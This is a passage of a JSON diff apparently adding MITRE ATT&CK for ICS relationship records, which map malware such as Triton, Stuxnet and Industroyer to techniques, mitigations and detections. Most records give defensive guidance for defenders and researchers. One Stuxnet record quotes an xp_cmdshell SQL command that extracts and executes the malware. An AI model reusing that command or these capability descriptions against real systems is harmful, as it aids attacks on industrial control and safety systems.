"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--93e24e03-6425-4ee8-99bb-c3a662c6cdce", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System 
Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:27:42.104Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) is able to read, write and execute code in memory on the safety controller at an arbitrary address within the devices firmware region. This allows the malware to make changes to the running firmware in memory and modify how the device operates. (Citation: DHS CISA February 2019)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--10e87e4b-a231-42e3-a011-0031f8226936", + "created": "2022-09-26T17:15:51.819Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:15:51.819Z", + "description": "Monitor for firmware changes which may be observable via operational alarms from devices.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 
"type": "relationship", + "id": "relationship--3ed98d8c-de30-499e-9a62-eae0207519f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.092Z", + "relationship_type": "mitigates", + "description": "Ensure embedded controls and network devices are protected through access management, as these devices often have unknown default accounts which could be used to gain unauthorized access.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8b491011-322d-4e0b-8f79-449e1b2ee185", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:55:26.030Z", + "description": "Monitor newly constructed processes that assist in lateral tool transfers, such as file transfer programs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c59a3d89-c8fa-4c5d-813e-f4495d892d1a", + "created": "2019-03-25T19:13:54.947Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT 
Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:32:08.109Z", + "description": "[WannaCry](https://attack.mitre.org/software/S0366) initially infected IT networks, but by means of an exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3d676c1b-2650-4599-8a57-790c55f9977d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.109Z", + "relationship_type": "mitigates", + "description": "Minimize the exposure of API calls that allow the execution of code.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7041d8e5-3b74-402a-86b3-fd59def80632", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": 
"2022-05-06T17:47:24.135Z", + "relationship_type": "mitigates", + "description": "Hot-standbys in diverse locations can ensure continued operations if the primarily system are compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol can be used to simultaneously use redundant and diverse communication over a local network. (Citation: M. Rentschler and H. Heine)\n", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8baa4d55-c235-44da-b6fe-8866cf7f9915", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:08:06.789Z", + "description": "Monitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d16e8909-d055-4174-aeb1-22c0613b2f73", + "created": 
"2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:53:55.028Z", + "description": "Disable unnecessary legacy network protocols that may be used for AiTM if applicable.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--69576d3c-d0e8-459e-9f2e-0b9c560b2e04", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Example mitigations could include minimizing its distribution/storage or obfuscating the information (e.g., facility coverterms, codenames). 
In many cases this information may be necessary to support critical engineering, maintenance, or operational functions, therefore, it may not be feasible to implement.\n", + "source_ref": "course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--578117b2-0f4b-4d75-a2dc-3ee45976e616", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:22:50.001Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. 
Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--44c6bc32-d2e5-42f5-8c2e-42f305cb589b", + "created": "2022-09-27T19:06:12.301Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T19:06:12.302Z", + "description": "A manipulated I/O image requires analyzing the application program running on the PLC for specific data block writes. 
Detecting this requires obtaining and analyzing a PLC’s application program, either directly from the device or from asset management platforms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "target_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2ff82993-5010-4450-89e7-341f449f3263", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.092Z", + "relationship_type": "mitigates", + "description": "Consider periodic reviews of accounts and privileges for critical and sensitive repositories.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--446c95ea-5178-4ae9-8f92-cb20dd50f7de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T12:36:26.506Z", + "modified": "2022-05-06T17:47:24.166Z", + "relationship_type": "mitigates", + "description": "Minimize the exposure of API calls that allow the execution of code.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + 
"x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--21b6ec9c-8779-49db-bf19-90e81893a6e4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.089Z", + "relationship_type": "mitigates", + "description": "Protect files stored locally with proper permissions to limit opportunities for adversaries to impact data storage. (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9d6f9bba-dd79-4cb6-a0f3-1284e58a6236", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 
2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:53:56.368Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604)'s data wiper component removes the registry image path throughout the system and overwrites all files, rendering the system unusable. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dadfed22-d70c-482b-9026-964396d75484", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:42:28.053Z", + "description": "Monitor for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. 
This could include suspicious files written to disk.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c195a0e9-d46c-487f-9a96-b138e9ca05d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.204Z", + "relationship_type": "mitigates", + "description": "Consider restricting access to email within critical process environments. Additionally, downloads and attachments may be disabled if email is still necessary.\n", + "source_ref": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--70113c21-85f2-4232-8755-233f93864277", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T19:17:12.033Z", + "description": "Monitor processes and command-line arguments to see if critical processes are terminated or stop running. 
For added context on adversary procedures and background see [Service Stop](https://attack.mitre.org/techniques/T1489).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6baa9172-04e4-416d-a009-668cda23fd5d", + "created": "2021-10-08T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T17:13:18.889Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) will store and execute SQL code that will extract and execute Stuxnet from the saved CAB file using xp_cmdshell with the following command: `set @s = master..xp _ cmdshell extrac32 /y +@t+ +@t+x; exec(@s);` (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d2db896-3051-483c-bc53-ca21832ee085", 
+ "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:47:23.983Z", + "description": "Monitor network traffic for suspicious email attachments. Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Use web proxies to review content of emails including sender information, headers, and attachments for potentially malicious content.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4b98b72c-a093-4917-a21b-a0b4f388e98e", + "created": "2023-03-31T17:45:09.659Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. 
Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T17:51:39.294Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used MS-SQL access to a pivot machine, allowing code execution throughout the ICS network.(Citation: Dragos Crashoverride 2018)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--591620d3-5549-49db-9080-43f86a68a590", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:25:07.936Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) leverages a previously-unknown vulnerability affecting Tricon MP3008 firmware versions 10.010.4 allows an insecurely-written system call to be exploited to achieve an arbitrary 2-byte write primitive, which is then used to gain supervisor privileges. 
(Citation: DHS CISA February 2019)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d8354850-bd4c-4bd9-a585-b107f5f1398f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:28:39.359Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) has the capability to reprogram the SIS logic to allow unsafe conditions to persist or reprogram the SIS to allow an unsafe state while using the DCS to create an unsafe state or hazard. 
(Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--10626671-941d-4a82-a835-56059058ef87", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.065Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--52c7176b-431d-44a6-8c03-7c15a8cf6ce1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.133Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 
2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--276aa6a6-e700-470a-8f72-02537ba7be9d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "Configure features related to account use like login attempt lockouts, specific login times, and password strength requirements as examples. Consider these features as they relate to assets which may impact safety and availability. (Citation: Keith Stouffer May 2015)\n", + "source_ref": "course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 
